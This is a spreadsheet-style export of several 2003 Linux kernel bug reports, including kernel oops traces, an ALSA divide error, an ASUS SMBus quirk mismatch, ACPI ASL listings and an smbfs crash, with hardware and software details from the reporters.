    <t>Distribution: Debian/Woody with backports Hardware Environment: CPU: model name : AMD Duron(tm) Processor stepping : 1 cpu MHz : 1194.943 lspci: 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 735 Host (rev 01) 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] 5591/5592 AGP 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] 85C503/5513 00:02.2 USB Controller: Silicon Integrated Systems [SiS] 7001 (rev 07) 00:02.3 USB Controller: Silicon Integrated Systems [SiS] 7001 (rev 07) 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS7012 PCI Audio Accelerator (rev a0) 00:03.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 10/100 Ethernet (rev 90) 00:0b.0 Multimedia audio controller: Ensoniq 5880 AudioPCI (rev 02) 00:0d.0 Multimedia video controller: Brooktree Corporation Bt878 (rev 02) 00:0d.1 Multimedia controller: Brooktree Corporation Bt878 (rev 02) 00:0f.0 Ethernet controller: Digital Equipment Corporation DECchip 21140 [FasterNet] (rev 22) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX] (rev a1) # fdisk -l /dev/hda Disk /dev/hda: 255 heads, 63 sectors, 9729 cylinders Units = cylinders of 16065 * 512 bytes Device Boot Start End Blocks Id System /dev/hda1 1 13 102784+ 83 Linux Partition 1 does not end on cylinder boundary: phys=(203, 15, 63) should be (203, 254, 63) /dev/hda2 13 141 1024128 83 Linux Partition 2 does not end on cylinder boundary: phys=(1023, 15, 63) should be (1023, 254, 63) /dev/hda3 141 9730 77023800 8e Linux LVM Partition 3 does not end on cylinder boundary: phys=(1023, 15, 63) should be (1023, 254, 63) Software Environment: binutils 2.12.90.0.1-4 e2fsprogs 1.34+1.35-WIP-2003 (backport) gcc 2.95.4-14 lvm2 2.00.07-1 (backport) module-init-tools 0.9.15-pre3-2 (backport) xawtv 3.90 (backport) xserver-xfree86 4.1.0-16woody1 The System has a 2 GB swap volume on LVM. Problem Description: kswapd crashed. Dec 11 12:05:50 ws kernel: Unable to handle kernel paging request at virtual address 0ecf5408 Dec 11 12:05:50 ws kernel: printing eip: Dec 11 12:05:50 ws kernel: c0159602 Dec 11 12:05:50 ws kernel: *pde = 00000000 Dec 11 12:05:50 ws kernel: Oops: 0002 [#1] Dec 11 12:05:50 ws kernel: CPU: 0 Dec 11 12:05:50 ws kernel: EIP: 0060:[&lt;c0159602&gt;] Not tainted Dec 11 12:05:50 ws kernel: EFLAGS: 00010202 Dec 11 12:05:50 ws kernel: EIP is at prune_icache+0x72/0x1b0 Dec 11 12:05:50 ws kernel: eax: 0ecf5408 ebx: d1d5d170 ecx: 00000080 edx: c03012cc Dec 11 12:05:50 ws kernel: esi: d1d5d178 edi: 00000000 ebp: dfe47eac esp: dfe47e8c Dec 11 12:05:50 ws kernel: ds: 007b es: 007b ss: 0068 Dec 11 12:05:50 ws kernel: Process kswapd0 (pid: 9, threadinfo=dfe46000 task=dfe5e6b0) Dec 11 12:05:50 ws kernel: Stack: 00000080 0000029a dfe46000 00000004 c03012d8 00000004 df783cf8 df7834f8 Dec 11 12:05:50 ws kernel: 00000000 c0159755 00000080 c0135e4c 00000080 000000d0 000001b8 c02ffebc Dec 11 12:05:50 ws kernel: ffffffdc 00000001 03ac65e0 00000000 c03004ec 00012ed3 dfffeb20 c0136e68 Dec 11 12:05:50 ws kernel: Call Trace: Dec 11 12:05:50 ws kernel: [&lt;c0159755&gt;] shrink_icache_memory+0x15/0x20 Dec 11 12:05:50 ws kernel: [&lt;c0135e4c&gt;] shrink_slab+0x10c/0x170 Dec 11 12:05:50 ws kernel: [&lt;c0136e68&gt;] balance_pgdat+0x128/0x1d0 Dec 11 12:05:50 ws kernel: [&lt;c0137014&gt;] kswapd+0x104/0x110 Dec 11 12:05:50 ws kernel: [&lt;c0136f10&gt;] kswapd+0x0/0x110 Dec 11 12:05:50 ws kernel: [&lt;c0117ba0&gt;] autoremove_wake_function+0x0/0x40 Dec 11 12:05:50 ws kernel: [&lt;c0117ba0&gt;] autoremove_wake_function+0x0/0x40 Dec 11 12:05:50 ws kernel: [&lt;c0106fad&gt;] kernel_thread_helper+0x5/0x18 Dec 11 12:05:50 ws kernel: Dec 11 12:05:50 ws kernel: Code: 89 10 a1 cc 12 30 c0 89 70 04 89 06 c7 46 04 cc 12 30 c0 89 Complete kernel.log at http://www-user.tu-chemnitz.de/~schrd/kernel.log Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.0 fails to compile</t>
  </si>
  <si>
    <t>2003-12-20 08:27 UTC</t>
  </si>
  <si>
    <t>Luis Alberto</t>
  </si>
  <si>
    <t>2003-12-20 09:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: Software Environment: gcc 3.3.3 Problem Description: Steps to reproduce: 2.6.0 fails to compile with this config (attached)</t>
  </si>
  <si>
    <t>divide error at snd_pcm_timer_resolution_change</t>
  </si>
  <si>
    <t>2003-12-20 18:45 UTC</t>
  </si>
  <si>
    <t>2005-07-13 17:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: K7 Software Environment: wine 20031118, glibc 2.3.2.ds1-10 Problem Description: Dec 20 23:27:22 flower kernel: can't create port Dec 20 23:27:26 flower kernel: divide error: 0000 [#1] Dec 20 23:27:26 flower kernel: CPU: 0 Dec 20 23:27:26 flower kernel: EIP: 0060:[snd_pcm_timer_resolution_change+126/144] Not tainted Dec 20 23:27:26 flower kernel: EFLAGS: 00010246 Dec 20 23:27:26 flower kernel: EIP is at snd_pcm_timer_resolution_change+0x7e/0x90 Dec 20 23:27:26 flower kernel: eax: f4240000 ebx: 00008000 ecx: 00008000 edx: 00000000 Dec 20 23:27:26 flower kernel: esi: 00000000 edi: f4240000 ebp: c35bdc00 esp: c36b3bbc Dec 20 23:27:26 flower kernel: ds: 007b es: 007b ss: 0068 Dec 20 23:27:26 flower kernel: Process wine.bin-pthrea (pid: 11613, threadinfo=c36b2000 task=c1fc92a0) Dec 20 23:27:26 flower kernel: Stack: 00000001 00008000 c35bdc00 00000001 c36b3c00 cfb77e40 c03ab619 cfb77e40 Dec 20 23:27:26 flower kernel: c36b3c00 c35bd400 c36b3c00 cfb77e40 00000000 c03ab71f cfb77e40 c36b3c00 Dec 20 23:27:26 flower kernel: 0000025c 00000000 00000008 00000000 00000000 00000000 00000000 00000000 Dec 20 23:27:26 flower kernel: Call Trace: Dec 20 23:27:26 flower kernel: [snd_pcm_hw_params+505/656] snd_pcm_hw_params+0x1f9/0x290 Dec 20 23:27:26 flower kernel: [snd_pcm_hw_params_user+111/208] snd_pcm_hw_params_user+0x6f/0xd0 Dec 20 23:27:26 flower kernel: [snd_pcm_playback_ioctl1+100/1056] snd_pcm_playback_ioctl1+0x64/0x420 Dec 20 23:27:26 flower kernel: [snd_pcm_hw_param_near+498/656] snd_pcm_hw_param_near+0x1f2/0x290 Dec 20 23:27:26 flower kernel: [snd_pcm_kernel_playback_ioctl+56/80] snd_pcm_kernel_playback_ioctl+0x38/0x50 Dec 20 23:27:26 flower kernel: [snd_pcm_oss_change_params+1123/2160] snd_pcm_oss_change_params+0x463/0x870 Dec 20 23:27:26 flower kernel: [snd_pcm_oss_get_active_substream+79/96] snd_pcm_oss_get_active_substream+0x4f/0x60 Dec 20 23:27:26 flower kernel: [snd_pcm_oss_get_rate+23/48] snd_pcm_oss_get_rate+0x17/0x30 Dec 20 23:27:26 flower kernel: [snd_pcm_oss_ioctl+1680/1888] snd_pcm_oss_ioctl+0x690/0x760 Dec 20 23:27:26 flower kernel: [sys_ioctl+275/704] sys_ioctl+0x113/0x2c0 Dec 20 23:27:26 flower kernel: [sysenter_past_esp+82/113] sysenter_past_esp+0x52/0x71 Dec 20 23:27:26 flower kernel: Dec 20 23:27:26 flower kernel: Code: f7 f6 89 85 14 02 00 00 83 c4 08 5b 5e 5f 5d c3 89 f6 8b 44 Dec 20 23:28:22 flower kernel: &lt;3&gt;can't create port Dec 20 23:28:35 flower kernel: can't create port Dec 20 23:28:37 flower kernel: divide error: 0000 [#2] Dec 20 23:28:37 flower kernel: CPU: 0 Dec 20 23:28:37 flower kernel: EIP: 0060:[snd_pcm_timer_resolution_change+126/144] Not tainted Dec 20 23:28:37 flower kernel: EFLAGS: 00010246 Dec 20 23:28:37 flower kernel: EIP is at snd_pcm_timer_resolution_change+0x7e/0x90 Dec 20 23:28:37 flower kernel: eax: f4240000 ebx: 00008000 ecx: 00008000 edx: 00000000 Dec 20 23:28:37 flower kernel: esi: 00000000 edi: f4240000 ebp: ca666800 esp: c09cfbbc Dec 20 23:28:37 flower kernel: ds: 007b es: 007b ss: 0068 Dec 20 23:28:37 flower kernel: Process wine.bin-pthrea (pid: 11701, threadinfo=c09ce000 task=c1fc8660) Dec 20 23:28:37 flower kernel: Stack: 00000001 00008000 ca666800 00000001 c09cfc00 cfb77d80 c03ab619 cfb77d80 Dec 20 23:28:37 flower kernel: c09cfc00 c52da000 c09cfc00 cfb77d80 00000000 c03ab71f cfb77d80 c09cfc00 Dec 20 23:28:37 flower kernel: 0000025c 00000000 00000008 00000000 00000000 00000000 00000000 00000000 Dec 20 23:28:37 flower kernel: Call Trace: Dec 20 23:28:37 flower kernel: [snd_pcm_hw_params+505/656] snd_pcm_hw_params+0x1f9/0x290 Dec 20 23:28:37 flower kernel: [snd_pcm_hw_params_user+111/208] snd_pcm_hw_params_user+0x6f/0xd0 Dec 20 23:28:37 flower kernel: [snd_pcm_playback_ioctl1+100/1056] snd_pcm_playback_ioctl1+0x64/0x420 Dec 20 23:28:37 flower kernel: [snd_pcm_hw_param_near+498/656] snd_pcm_hw_param_near+0x1f2/0x290 Dec 20 23:28:37 flower kernel: [snd_pcm_kernel_playback_ioctl+56/80] snd_pcm_kernel_playback_ioctl+0x38/0x50 Dec 20 23:28:37 flower kernel: [snd_pcm_oss_change_params+1123/2160] snd_pcm_oss_change_params+0x463/0x870 Dec 20 23:28:37 flower kernel: [snd_pcm_oss_get_active_substream+79/96] snd_pcm_oss_get_active_substream+0x4f/0x60 Dec 20 23:28:37 flower kernel: [snd_pcm_oss_get_rate+23/48] snd_pcm_oss_get_rate+0x17/0x30 Dec 20 23:28:37 flower kernel: [snd_pcm_oss_ioctl+1680/1888] snd_pcm_oss_ioctl+0x690/0x760 Dec 20 23:28:37 flower kernel: [sys_ioctl+275/704] sys_ioctl+0x113/0x2c0 Dec 20 23:28:37 flower kernel: [sysenter_past_esp+82/113] sysenter_past_esp+0x52/0x71 Dec 20 23:28:37 flower kernel: Dec 20 23:28:37 flower kernel: Code: f7 f6 89 85 14 02 00 00 83 c4 08 5b 5e 5f 5d c3 89 f6 8b 44 Dec 20 23:28:58 flower kernel: hda: dma_intr: status=0x51 { DriveReady SeekComplete Error } Dec 20 23:37:20 flower kernel: can't create port Dec 20 23:37:21 flower kernel: divide error: 0000 [#3] Dec 20 23:37:21 flower kernel: CPU: 0 Dec 20 23:37:21 flower kernel: EIP: 0060:[snd_pcm_timer_resolution_change+126/144] Not tainted Dec 20 23:37:21 flower kernel: EFLAGS: 00010246 Dec 20 23:37:21 flower kernel: EIP is at snd_pcm_timer_resolution_change+0x7e/0x90 Dec 20 23:37:21 flower kernel: eax: f4240000 ebx: 00008000 ecx: 00008000 edx: 00000000 Dec 20 23:37:21 flower kernel: esi: 00000000 edi: f4240000 ebp: ca666400 esp: c72edbbc Dec 20 23:37:21 flower kernel: ds: 007b es: 007b ss: 0068 Dec 20 23:37:21 flower kernel: Process wine.bin-pthrea (pid: 11934, threadinfo=c72ec000 task=cc9980c0) Dec 20 23:37:21 flower kernel: Stack: 00000001 00008000 ca666400 00000001 c72edc00 cfb77cc0 c03ab619 cfb77cc0 Dec 20 23:37:21 flower kernel: c72edc00 c8cbf400 c72edc00 cfb77cc0 00000000 c03ab71f cfb77cc0 c72edc00 Dec 20 23:37:21 flower kernel: 0000025c 00000000 00000008 00000000 00000000 00000000 00000000 00000000 Dec 20 23:37:21 flower kernel: Call Trace: Dec 20 23:37:21 flower kernel: [snd_pcm_hw_params+505/656] snd_pcm_hw_params+0x1f9/0x290 Dec 20 23:37:21 flower kernel: [snd_pcm_hw_params_user+111/208] snd_pcm_hw_params_user+0x6f/0xd0 Dec 20 23:37:21 flower kernel: [snd_pcm_playback_ioctl1+100/1056] snd_pcm_playback_ioctl1+0x64/0x420 Dec 20 23:37:21 flower kernel: [snd_pcm_hw_param_near+498/656] snd_pcm_hw_param_near+0x1f2/0x290 Dec 20 23:37:21 flower kernel: [snd_pcm_kernel_playback_ioctl+56/80] snd_pcm_kernel_playback_ioctl+0x38/0x50 Dec 20 23:37:21 flower kernel: [snd_pcm_oss_change_params+1123/2160] snd_pcm_oss_change_params+0x463/0x870 Dec 20 23:37:21 flower kernel: [snd_pcm_oss_get_active_substream+79/96] snd_pcm_oss_get_active_substream+0x4f/0x60 Dec 20 23:37:21 flower kernel: [snd_pcm_oss_get_rate+23/48] snd_pcm_oss_get_rate+0x17/0x30 Dec 20 23:37:21 flower kernel: [snd_pcm_oss_ioctl+1680/1888] snd_pcm_oss_ioctl+0x690/0x760 Dec 20 23:37:21 flower kernel: [sys_ioctl+275/704] sys_ioctl+0x113/0x2c0 Dec 20 23:37:21 flower kernel: [sysenter_past_esp+82/113] sysenter_past_esp+0x52/0x71 Dec 20 23:37:21 flower kernel: Dec 20 23:37:21 flower kernel: Code: f7 f6 89 85 14 02 00 00 83 c4 08 5b 5e 5f 5d c3 89 f6 8b 44 Steps to reproduce: I was playing with wine and some random games. I don't know if I can reproduce it. # CONFIG_SND_DEBUG is not set If I understand correctly, even without CONFIG_SND_DEBUG it should handle bogus values gracefully. Looks like it's not checking the input enough (maybe in snd_pcm_hw_params_user).</t>
  </si>
  <si>
    <t>ASUS SMBUS-Quirk does not work with P4B533-V</t>
  </si>
  <si>
    <t>2003-12-21 15:42 UTC</t>
  </si>
  <si>
    <t>Stephan Rave</t>
  </si>
  <si>
    <t>2004-02-18 13:33 UTC</t>
  </si>
  <si>
    <t>The check in asus_hides_smbus_hostbridge does not work for the P4B533-V. This board has an INTEL_82845G Hostbridge but the subsystem device is 0x8093 and not 0x80b2 as for the P4PE. Here is some output: lspci: 00:00.0 Host bridge: Intel Corp. 82845G/GL [Brookdale-G] Chipset Host Bridge (rev 01) 00:01.0 PCI bridge: Intel Corp. 82845G/GL [Brookdale-G] Chipset AGP Bridge (rev 01) 00:1d.0 USB Controller: Intel Corp. 82801DB USB (Hub #1) (rev 01) 00:1d.1 USB Controller: Intel Corp. 82801DB USB (Hub #2) (rev 01) 00:1d.2 USB Controller: Intel Corp. 82801DB USB (Hub #3) (rev 01) 00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB/EB PCI Bridge (rev 81) 00:1f.0 ISA bridge: Intel Corp. 82801DB LPC Interface Controller (rev 01) 00:1f.1 IDE interface: Intel Corp. 82801DB Ultra ATA Storage Controller (rev 01) 00:1f.3 SMBus: Intel Corp. 82801DB/DBM SMBus Controller (rev 01) 01:00.0 VGA compatible controller: nVidia Corporation NV25 [GeForce4 Ti 4200] (rev a3) 02:03.0 Multimedia audio controller: C-Media Electronics Inc CM8738 (rev 10) 02:08.0 Ethernet controller: Intel Corp. 82801BD PRO/100 VE (CNR) Ethernet Controller (rev 81) 02:0c.0 Multimedia controller: Philips Semiconductors SAA7134 (rev 01) pcitweak -l: PCI: Probing config type using method 1 PCI: Config type is 1 PCI: PCI scan (all values are in hex) PCI: 00:00:0: chip 8086,2560 card 1043,8093 rev 01 class 06,00,00 hdr 00 PCI: 00:01:0: chip 8086,2561 card 0000,0000 rev 01 class 06,04,00 hdr 01 PCI: 00:1d:0: chip 8086,24c2 card 1043,8089 rev 01 class 0c,03,00 hdr 80 PCI: 00:1d:1: chip 8086,24c4 card 1043,8089 rev 01 class 0c,03,00 hdr 00 PCI: 00:1d:2: chip 8086,24c7 card 1043,8089 rev 01 class 0c,03,00 hdr 00 PCI: 00:1e:0: chip 8086,244e card 0000,0000 rev 81 class 06,04,00 hdr 01 PCI: 00:1f:0: chip 8086,24c0 card 0000,0000 rev 01 class 06,01,00 hdr 80 PCI: 00:1f:1: chip 8086,24cb card 1043,8089 rev 01 class 01,01,8a hdr 00 PCI: 00:1f:3: chip 8086,24c3 card 1043,8089 rev 01 class 0c,05,00 hdr 00 PCI: 01:00:0: chip 10de,0253 card 0000,0000 rev a3 class 03,00,00 hdr 00 PCI: 02:03:0: chip 13f6,0111 card 1043,80e2 rev 10 class 04,01,00 hdr 00 PCI: 02:08:0: chip 8086,103a card 1043,8071 rev 81 class 02,00,00 hdr 00 PCI: 02:0c:0: chip 1131,7134 card ffff,ffff rev 01 class 04,80,00 hdr 00 PCI: End of PCI scan</t>
  </si>
  <si>
    <t>UtAllocate 0 length warnings</t>
  </si>
  <si>
    <t>2003-12-22 17:19 UTC</t>
  </si>
  <si>
    <t>A user reports: On my new Dell laptop I'm getting multiple complaints each time the battery monitor thread runs. Here's some gdb output from poking around: (kgdb) bt #0 0xc06a8dca in Debugger (msg=0x1b &lt;Address 0x1b out of bounds&gt;) at machine/atomic.h:263 #1 0xc0452527 in AcpiUtAllocate (Size=1, Component=128, Module=0xc06eb11e "", Line=166) at ../../../contrib/dev/acpica/utalloc.c:458 #2 0xc044611a in AcpiExStoreBufferToBuffer (SourceDesc=0x80, TargetDesc=0x1) at ../../../contrib/dev/acpica/exstorob.c:166 #3 0xc0446081 in AcpiExStoreObjectToObject (SourceDesc=0xa6, DestDesc=0xc2d386c0, NewDesc=0xcdcc09e8, WalkState=0x80) at ../../../contrib/dev/acpica/exstoren.c:348 #4 0xc0445d92 in AcpiExStoreObjectToIndex (SourceDesc=0xc2d384c0, IndexDesc=0x80, WalkState=0x1b) at ../../../contrib/dev/acpica/exstore.c:372 #5 0xc0445d0a in AcpiExStore (SourceDesc=0xa6, DestDesc=0x20, WalkState=0x80) at ../../../contrib/dev/acpica/exstore.c:243 #6 0xc0443b75 in AcpiExOpcode_1A_1T_1R (WalkState=0xa6) at ../../../contrib/dev/acpica/exoparg1.c:494 #7 0xc043c00d in AcpiDsExecEndOp (WalkState=0xc16ba400) at ../../../contrib/dev/acpica/dswexec.c:517 #8 0xc044c6f6 in AcpiPsParseLoop (WalkState=0xc16ba400) at ../../../contrib/dev/acpica/psparse.c:976 #9 0xc044cb1c in AcpiPsParseAml (WalkState=0xc16ba400) at ../../../contrib/dev/acpica/psparse.c:1258 #10 0xc044d80d in AcpiPsxExecute (MethodNode=0xc16b6e60, Params=0x0, ReturnObjDesc=0xcdcc0be8) at ../../../contrib/dev/acpica/psxface.c:288 #11 0xc0448dcf in AcpiNsExecuteControlMethod (MethodNode=0xc16b6e60, Params=0x1b, ReturnObjDesc=0x1b) at ../../../contrib/dev/acpica/nseval.c:527 #12 0xc0448d26 in AcpiNsEvaluateByHandle (Handle=0xc16b6e60, Params=0x1b, ReturnObject=0xc16b6e60) at ../../../contrib/dev/acpica/nseval.c:409 #13 0xc0448b9e in AcpiNsEvaluateRelative (Handle=0xc16b6e60, Pathname=0x1b &lt;Address 0x1b out of bounds&gt;, Params=0x1b, ReturnObject=0x1b) at ../../../contrib/dev/acpica/nseval.c:225 #14 0xc044aaa0 in AcpiEvaluateObject (Handle=0xc16b6f00, Pathname=0xc06ee623 "_BIF", ExternalParams=0x0, ReturnBuffer=0xcdcc0cb4) at ../../../contrib/dev/acpica/nsxfeval.c:357 #15 0xc045de26 in acpi_cmbat_get_bif (context=0xc16bd680) at ../../../dev/acpica/acpi_cmbat.c:250 This reports the warning "UtAllocate: Attempt to allocate zero bytes". Here is the section of ASL for _BIF: Name (BIFP, Package (0x0D) {}) Method (BIF, 1, NotSerialized) { SX10 () SX30 (0x01) SX30 (Arg0) SX11 () Store (SX42 (), Index (BIFP, 0x00)) Store (SX42 (), Index (BIFP, 0x01)) Store (SX42 (), Index (BIFP, 0x02)) Store (SX42 (), Index (BIFP, 0x03)) Store (SX42 (), Index (BIFP, 0x04)) Store (SX42 (), Index (BIFP, 0x05)) Store (SX42 (), Index (BIFP, 0x06)) Store (SX42 (), Index (BIFP, 0x07)) Store (SX42 (), Index (BIFP, 0x08)) Store (SX45 (), Index (BIFP, 0x09)) Store (SX45 (), Index (BIFP, 0x0A)) Store (SX45 (), Index (BIFP, 0x0B)) Store (SX45 (), Index (BIFP, 0x0C)) SX12 () Return (BIFP) } Name (SXX0, Buffer (0x0100) {}) Name (SXX1, Buffer (0x08) {}) CreateWordField (SXX1, 0x00, SXX2) CreateWordField (SXX1, 0x04, SXX3) Method (SX10, 0, NotSerialized) { Acquire (SMIX, 0xFFFF) Store (0x00, SXX2) } Method (SX30, 1, NotSerialized) { Store (SXX2, Local0) Increment (Local0) If (LNot (LGreater (Local0, SizeOf (SXX0)))) { CreateByteField (SXX0, SXX2, SX20) Store (Arg0, SX20) Store (Local0, SXX2) } } Method (SX31, 1, NotSerialized) { Store (SXX2, Local0) Add (Local0, 0x02, Local0) If (LNot (LGreater (Local0, SizeOf (SXX0)))) { CreateWordField (SXX0, SXX2, SX21) Store (Arg0, SX21) Store (Local0, SXX2) } } Method (SX32, 1, NotSerialized) { Store (SXX2, Local0) Add (Local0, 0x04, Local0) If (LNot (LGreater (Local0, SizeOf (SXX0)))) { CreateDWordField (SXX0, SXX2, SX22) Store (Arg0, SX22) Store (Local0, SXX2) } } Method (SX33, 2, NotSerialized) { If (LLess (Arg1, SizeOf (Arg0))) { CreateByteField (Arg0, Arg1, SX20) SX30 (SX20) } } Method (SX34, 2, NotSerialized) { Store (0x00, Local0) While (LLess (Local0, Arg1)) { SX33 (Arg0, Local0) Increment (Local0) } } Method (SXX6, 2, NotSerialized) { Store (Arg1, \_SB.SMIA) Store (Arg0, \_SB.SMIC) Store (\_SB.SMIC, Local0) While (LNot (LEqual (Local0, 0x00))) { Store (\_SB.SMIC, Local0) } Return (\_SB.SMIA) } Method (SXX5, 2, NotSerialized) { If (LLess (Arg1, SizeOf (Arg0))) { CreateByteField (Arg0, Arg1, SX20) SXX6 (0x7C, SX20) } } Method (SXX4, 0, NotSerialized) { SXX6 (0x7B, 0x00) Store (0x00, Local0) While (LLess (Local0, SXX2)) { SXX5 (SXX0, Local0) Increment (Local0) } } Method (SXX8, 2, NotSerialized) { If (LLess (Arg1, SizeOf (Arg0))) { CreateByteField (Arg0, Arg1, SX20) Store (SXX6 (0x7D, 0x00), SX20) } } Method (SXX7, 0, NotSerialized) { Store (0x00, Local0) While (LLess (Local0, SXX3)) { Add (SXX2, Local0, Local1) SXX8 (SXX0, Local1) Increment (Local0) } } Method (SX11, 0, NotSerialized) { SXX4 () Store (SXX6 (0x79, 0x00), SXX3) Add (SXX2, SXX3, Local0) If (LLess (SizeOf (SXX0), Local0)) { Store (SizeOf (SXX0), Local0) Subtract (Local0, SXX2, Local0) Store (Local0, SXX3) } SXX7 () } Method (SX40, 0, NotSerialized) { Store (SXX2, Local0) Increment (Local0) If (LNot (LGreater (Local0, SizeOf (SXX0)))) { CreateByteField (SXX0, SXX2, SX20) Store (Local0, SXX2) Return (SX20) } Return (0x00) } Method (SX41, 0, NotSerialized) { Store (SXX2, Local0) Add (Local0, 0x02, Local0) If (LNot (LGreater (Local0, SizeOf (SXX0)))) { CreateWordField (SXX0, SXX2, SX21) Store (Local0, SXX2) Return (SX21) } Return (0x00) } Method (SX42, 0, NotSerialized) { Store (SXX2, Local0) Add (Local0, 0x04, Local0) If (LNot (LGreater (Local0, SizeOf (SXX0)))) { CreateDWordField (SXX0, SXX2, SX22) Store (Local0, SXX2) Return (SX22) } Return (0x00) } Method (SX43, 2, NotSerialized) { If (LLess (Arg1, SizeOf (Arg0))) { CreateByteField (Arg0, Arg1, SX20) Store (SX40 (), SX20) } } Method (SX44, 2, NotSerialized) { Store (0x00, Local0) While (LLess (Local0, Arg1)) { SX43 (Arg0, Local0) Increment (Local0) } } Method (SX45, 0, NotSerialized) { Store (SX40 (), Local0) Name (SX23, Buffer (Local0) {}) SX44 (SX23, Local0) Return (SX23) } Method (SX12, 0, NotSerialized) { Release (SMIX) } Unfortunately, the AML seems obfuscated. The problem appears to be in SX45 but I'm not sure. Let me know what other info you'd like. This is with ACPI-CA 1203.</t>
  </si>
  <si>
    <t>use an implicit return value - AE_AML_NO_RETURN_VALUE</t>
  </si>
  <si>
    <t>2003-12-22 19:23 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:34 UTC</t>
  </si>
  <si>
    <t>FreeBSD does have a workaround for this. We use an implicit return value: http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/contrib/dev/acpica/psparse.c.diff?r1=1.20&amp;r2=1.21&amp;f=h -Nate On Fri, 19 Dec 2003, Brown, Len wrote: &gt; AML is like C -- if there is no return statement from a routine (method) &gt; then nothing gets returned. &gt; &gt; Unfortunately the microsoft implementation of the AML interpreter &gt; behaves as if there is a return statement, and so bugs in AML get &gt; through windows validation. &gt; &gt; For this to work on the ACPICA AML interpreter, you need to insert the &gt; missing return statements in the AML -- we don't have a workaround for &gt; this type of BIOS bug. &gt; &gt; -Len ~</t>
  </si>
  <si>
    <t>'ls' on smbfs mount causes oops</t>
  </si>
  <si>
    <t>2003-12-22 20:05 UTC</t>
  </si>
  <si>
    <t>Kevin Shanahan</t>
  </si>
  <si>
    <t>2004-11-30 21:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux Testing (Sarge) Hardware Environment: Toshiba Libretto L5 LAN (laptop) - Transmeta Crusoe TM5800 Software Environment: (will attach config) Mounted smb filesystem is on a Snap Server (http://www.snapappliance.com) if that makes a difference. Problem Description: I have been getting regular lockups on 2.6.0-test kernels for a while and finally realised that it always occured while interacting with directory listings on smbfs mounts. Usually triggered by tab completion in bash or emacs and sometimes just plain 'ls' will do it. The "oops" below was produced by just running ls in a few different directories. (it didn't say "oops", but I seem to recall seeing "invalid paging request" or something on the console, which didn't make it into /var/log/messages): Dec 23 14:07:05 arakasi kernel: printing eip: Dec 23 14:07:05 arakasi kernel: c014b235 Dec 23 14:07:05 arakasi kernel: Oops: 0002 [#1] Dec 23 14:07:05 arakasi kernel: CPU: 0 Dec 23 14:07:05 arakasi kernel: EIP: 0060:[store_stackinfo+37/144] Not tainted Dec 23 14:07:05 arakasi kernel: EFLAGS: 00010016 Dec 23 14:07:05 arakasi kernel: EIP is at store_stackinfo+0x25/0x90 Dec 23 14:07:05 arakasi kernel: eax: c91c6000 ebx: c91c6000 ecx: 00002000 edx: 00002000 Dec 23 14:07:05 arakasi kernel: esi: cefe90a0 edi: 0000006b ebp: c85bfdf0 esp: c85bfddc Dec 23 14:07:05 arakasi kernel: ds: 007b es: 007b ss: 0068 Dec 23 14:07:05 arakasi kernel: Process ls (pid: 562, threadinfo=c85be000 task=c92ad960) Dec 23 14:07:05 arakasi kernel: Stack: c85bfdf0 00002000 00000000 cefe90a0 0000006b c85bfe28 c014e0fc cefe90a0 Dec 23 14:07:05 arakasi kernel: c91c6000 0000006b 0003dfb5 091c6000 c01f17cc c91c6000 cefe8390 00000286 Dec 23 14:07:05 arakasi kernel: c9263eec 00000000 00000000 c85bfe3c c01f17cc c91c6000 c9208080 c9263eec Dec 23 14:07:05 arakasi kernel: Call Trace: Dec 23 14:07:05 arakasi kernel: [kfree+524/1056] kfree+0x20c/0x420 Dec 23 14:07:05 arakasi kernel: [smb_free_request+76/96] smb_free_request+0x4c/0x60 Dec 23 14:07:05 arakasi kernel: [smb_free_request+76/96] smb_free_request+0x4c/0x60 Dec 23 14:07:05 arakasi kernel: [smb_proc_readdir_long+763/1264] smb_proc_readdir_long+0x2fb/0x4f0 Dec 23 14:07:05 arakasi kernel: [filldir64+0/304] filldir64+0x0/0x130 Dec 23 14:07:05 arakasi kernel: [find_or_create_page+70/192] find_or_create_page+0x46/0xc0 Dec 23 14:07:05 arakasi kernel: [smb_readdir+929/1584] smb_readdir+0x3a1/0x630 Dec 23 14:07:05 arakasi kernel: [filldir64+0/304] filldir64+0x0/0x130 Dec 23 14:07:05 arakasi kernel: [vfs_readdir+150/160] vfs_readdir+0x96/0xa0 Dec 23 14:07:05 arakasi kernel: [filldir64+0/304] filldir64+0x0/0x130 Dec 23 14:07:05 arakasi kernel: [sys_getdents64+107/165] sys_getdents64+0x6b/0xa5 Dec 23 14:07:05 arakasi kernel: [filldir64+0/304] filldir64+0x0/0x130 Dec 23 14:07:05 arakasi kernel: [syscall_call+7/11] syscall_call+0x7/0xb Dec 23 14:07:05 arakasi kernel: Dec 23 14:07:05 arakasi kernel: Code: c7 03 78 56 34 12 83 ea 0c 8d 7d 10 8b 45 10 83 c3 04 89 03 Steps to reproduce: 1. mount an smbfs filesystem 2. (at bash prompt on console) cd $somedir; ls 3. Repeat step 2 for various values of $somedir (where $somedir is located on mounted smb filesystem)</t>
  </si>
  <si>
    <t>Unable to boot SCSI Drive LSI53C1010-33</t>
  </si>
  <si>
    <t>2003-12-24 10:34 UTC</t>
  </si>
  <si>
    <t>Matthew Balman</t>
  </si>
  <si>
